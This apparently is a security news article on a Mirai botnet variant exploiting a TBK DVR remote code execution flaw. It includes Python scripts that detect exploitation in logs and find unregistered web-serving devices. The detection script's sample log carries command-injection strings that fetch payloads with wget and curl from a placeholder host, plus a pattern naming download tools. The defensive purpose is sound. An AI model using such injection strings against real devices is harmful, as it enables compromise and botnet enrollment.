Nexcorium: A Vulnerability-Driven Mirai Variant Hijacking IoT for High-Volume DDoS
The classic Mirai botnet has evolved, weaponizing a critical RCE vulnerability in TBK-brand DVR devices to scale its destructive volumetric traffic capabilities.
TEL AVIV, ISRAEL — Cybersecurity researchers have identified a sophisticated new variant of the notorious Mirai botnet, dubbed Nexcorium, which is rapidly expanding its footprint by exploiting unpatched vulnerabilities in internet-connected Digital Video Recorders (DVRs). The campaign is notable for its move away from simple brute-force attacks on default passwords, instead focusing on high-precision exploit delivery to create a massive, coordinated Distributed Denial of Service (DDoS) weapon.
Analysis from Security Affairs and SC Media shows the malware currently has hardcoded targeting logic for systems manufactured by TBK, a major global supplier of video surveillance hardware.
Nexcorium Campaign Technical Breakdown
The Attack Vector: Exploiting the TBK Loophole
The defining feature of the Nexcorium campaign is its exploitation of CVE-2024-3721, a critical Remote Code Execution (RCE) flaw. This vulnerability lies within a specialized HTTP service running on TBK’s localized DVR models (DVR4104 and DVR4216).
By sending a single, crafted network request to the vulnerable service, attackers can execute arbitrary commands on the DVR without needing to authenticate.
Once breached, the device is immediately enrolled in the Nexcorium botnet:
- Automated Infection: A multi-stage dropper script is executed, which detects the device’s CPU architecture (e.g., MIPS, ARM, Intel) and downloads the corresponding specialized malware binary.
- C&C Architecture: Nexcorium utilizes a decentralized Command & Control (C&C) structure, often hiding its traffic within legitimate-looking peer-to-peer (P2P) network protocols, making it difficult to trace or shut down.
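The two stages above (an unauthenticated request carrying a command into the DVR's HTTP service, followed by the dropper fetching an architecture-specific binary) leave two correlatable traces: the inbound request in the device's or a reverse proxy's access log, and the outbound download at the egress firewall. The following script is an added defender's example, not code from the article or from any vendor; it runs over constructed log lines, and the `/cgi-bin/status` path, the IP addresses and the log field layout are hypothetical placeholders rather than the real exploit endpoint or real traffic. It flags query strings that contain shell syntax or download utilities, flags outbound fetches of files named after a CPU architecture (the Mirai-family dropper convention), and joins the two on the DVR's address.

```python
"""Added example: correlate command-injection-shaped requests to a DVR HTTP service
with follow-on architecture-named payload fetches, over constructed log lines."""
import re
from urllib.parse import unquote

# Constructed web access log (not captured traffic). Fields: src dst method path status
# The /cgi-bin/status path is a hypothetical placeholder, not the real TBK endpoint.
WEB_LOG = """\
10.0.5.23 192.168.40.11 GET /cgi-bin/status?opt=sys 200
203.0.113.9 192.168.40.11 GET /cgi-bin/status?opt=sys&cmd=;wget%20http://198.51.100.7/x86 200
203.0.113.9 192.168.40.12 GET /cgi-bin/status?opt=sys&cmd=$(curl%20198.51.100.7/mips) 200
10.0.5.23 192.168.40.11 POST /login 302
"""

# Constructed egress firewall/proxy log. Fields: src dst url
EGRESS_LOG = """\
192.168.40.11 198.51.100.7 http://198.51.100.7/x86
192.168.40.12 198.51.100.7 http://198.51.100.7/mips
192.168.40.13 93.184.216.34 http://example.com/firmware.bin
"""

# Shell metacharacters and download utilities that have no business in a DVR query string.
INJECTION_RE = re.compile(r"[;|`]|\$\(|&&|\b(wget|curl|tftp|busybox)\b", re.IGNORECASE)

# Mirai-family droppers fetch one binary per CPU architecture, named after that architecture.
ARCH_RE = re.compile(
    r"/(mips|mipsel|mpsl|arm[0-9]*|armv[0-9]l|x86|x86_64|i686|sh4|ppc|m68k|sparc)(\.\w+)?$",
    re.IGNORECASE,
)


def find_injection_attempts(web_log: str):
    """Return (src, dst, decoded_path) for requests whose query string carries shell syntax."""
    hits = []
    for line in web_log.splitlines():
        if not line.strip():
            continue
        src, dst, _method, path, _status = line.split()
        decoded = unquote(path)            # %20 etc. hide metacharacters from naive matching
        query = decoded.partition("?")[2]
        if query and INJECTION_RE.search(query):
            hits.append((src, dst, decoded))
    return hits


def find_arch_payload_fetches(egress_log: str):
    """Return (src, url, arch) for outbound fetches of architecture-named files."""
    hits = []
    for line in egress_log.splitlines():
        if not line.strip():
            continue
        src, _dst, url = line.split()
        match = ARCH_RE.search(url)
        if match:
            hits.append((src, url, match.group(1).lower()))
    return hits


def correlate(web_log: str, egress_log: str):
    """Map each DVR that received an injection attempt to a verdict.

    A device that both received a shell-laden request and then fetched an
    architecture-named file is a strong compromise indicator; an attempt with no
    follow-on fetch still warrants blocking the source and checking the patch level.
    """
    attempted = {dst for _, dst, _ in find_injection_attempts(web_log)}
    fetched = {src: arch for src, _, arch in find_arch_payload_fetches(egress_log)}
    verdicts = {}
    for dvr in sorted(attempted):
        if dvr in fetched:
            verdicts[dvr] = "likely compromised, fetched %s payload" % fetched[dvr]
        else:
            verdicts[dvr] = "exploit attempt observed, no payload fetch seen"
    return verdicts


if __name__ == "__main__":
    for dvr, verdict in correlate(WEB_LOG, EGRESS_LOG).items():
        print(dvr, verdict)
```

In a real deployment the two inputs come from the reverse proxy in front of the DVR segment and from the segment's egress firewall; the join on the DVR address is what turns two low-confidence signals into one high-confidence alert, and the egress match alone is enough to justify denying the segment any outbound HTTP it does not need.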
Volumetric DDoS: The Endgame
Unlike the original Mirai, which focused heavily on "TCP SYN" and "UDP Floods," analysis from BackBox indicates that Nexcorium includes several specialized application-layer attack vectors designed to overwhelm target websites and APIs. The malware’s primary objective appears to be fulfilling DDoS-for-hire contracts, generating high-volume traffic aimed at financial institutions, gaming networks, and other high-profile targets.
This shift to vulnerability-driven enrollment is a concerning maturation. "Brute-forcing works when users forget to change defaults, but exploiting an RCE flaw means even a security-conscious owner is a victim until they apply the patch," said a lead researcher in a Reddit InfoSecNews discussion.
The CyberSignal Analysis
Signal 01 — The Resurgence of the "IoT Squeeze"
Nexcorium is a powerful "Signal" that the risk associated with the IoT Supply Chain is reaching a boiling point. For B2B firms, the "Signal" is that these devices are not just endpoints; they are "Force Multipliers" for attackers. If your enterprise deploys surveillance hardware, HVAC controllers, or localized printers on an unprotected "Flat" network, those devices will eventually be weaponized in a larger campaign against your own clients.
Signal 02 — The Death of Brute-Force as a Primary Vector
The IoT landscape is hardening slightly, with newer devices enforcing password changes on setup. Attacker groups are adapting by shifting to exploitation of unpatched vulnerabilities. This means your asset discovery program must extend beyond traditional servers and laptops to include "Shadow IT" (e.g., the security cameras installed by a facilities team without IT oversight). If it has an IP address and runs a web service, it is a target.
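The practical form of that asset-discovery extension is a reconciliation: take what the network actually sees (DHCP leases, plus which hosts answer on web ports) and subtract what the CMDB admits to knowing, and whatever is left is the Shadow IT that needs a patch and a network segment. The script below is an added example, not from the article; the lease export, the port observations, the CMDB contents and the IP ranges are all constructed, and the field layouts are assumptions about a typical export rather than any particular product's format.

```python
"""Added example: find devices on the network that expose a web service but are
absent from the asset inventory, using constructed DHCP and scan data."""

# Constructed DHCP lease export. Fields: ip mac hostname
DHCP_LEASES = """\
192.168.40.11 aa:bb:cc:00:01:11 dvr-lobby
192.168.40.12 aa:bb:cc:00:01:12 dvr-loading-dock
192.168.40.20 00:11:22:33:44:55 hvac-ctl-3
10.0.5.23 de:ad:be:ef:00:23 lt-finance-07
10.0.5.40 de:ad:be:ef:00:40 srv-gitlab
"""

# Constructed listening-service observations from a scheduled internal scan. Fields: ip port
OPEN_PORTS = """\
192.168.40.11 80
192.168.40.11 554
192.168.40.12 80
192.168.40.20 443
10.0.5.40 443
10.0.5.40 22
"""

# Hostnames the CMDB actually knows about (constructed).
CMDB = {"lt-finance-07", "srv-gitlab"}

# Ports on which an embedded device typically serves its management web UI (assumption).
WEB_PORTS = {80, 443, 8000, 8080, 8443, 8888}


def parse_leases(text: str) -> dict:
    """ip -> (mac, hostname)"""
    leases = {}
    for line in text.splitlines():
        if line.strip():
            ip, mac, hostname = line.split()
            leases[ip] = (mac, hostname)
    return leases


def parse_ports(text: str) -> dict:
    """ip -> set of open ports"""
    ports = {}
    for line in text.splitlines():
        if line.strip():
            ip, port = line.split()
            ports.setdefault(ip, set()).add(int(port))
    return ports


def shadow_web_devices(leases_text: str, ports_text: str, cmdb: set) -> list:
    """Return devices that (a) hold a lease, (b) expose a web port, and (c) are not in the CMDB.

    A device meeting all three is exactly the "has an IP address and runs a web
    service" case: reachable, attackable through its HTTP stack, and invisible to
    the patching process. Results are sorted by IP for stable reporting.
    """
    leases = parse_leases(leases_text)
    ports = parse_ports(ports_text)
    findings = []
    for ip, (mac, hostname) in leases.items():
        web = sorted(ports.get(ip, set()) & WEB_PORTS)
        if web and hostname not in cmdb:
            findings.append({"ip": ip, "mac": mac, "hostname": hostname, "web_ports": web})
    return sorted(findings, key=lambda f: tuple(int(o) for o in f["ip"].split(".")))


if __name__ == "__main__":
    for device in shadow_web_devices(DHCP_LEASES, OPEN_PORTS, CMDB):
        print(device)
```

Running the reconciliation on a schedule, rather than once, is what makes it catch the camera a facilities team adds next month; each finding should open a ticket to either register the device and put it on a patch cadence, or move it off the flat network into a segment with no outbound access beyond what the device needs.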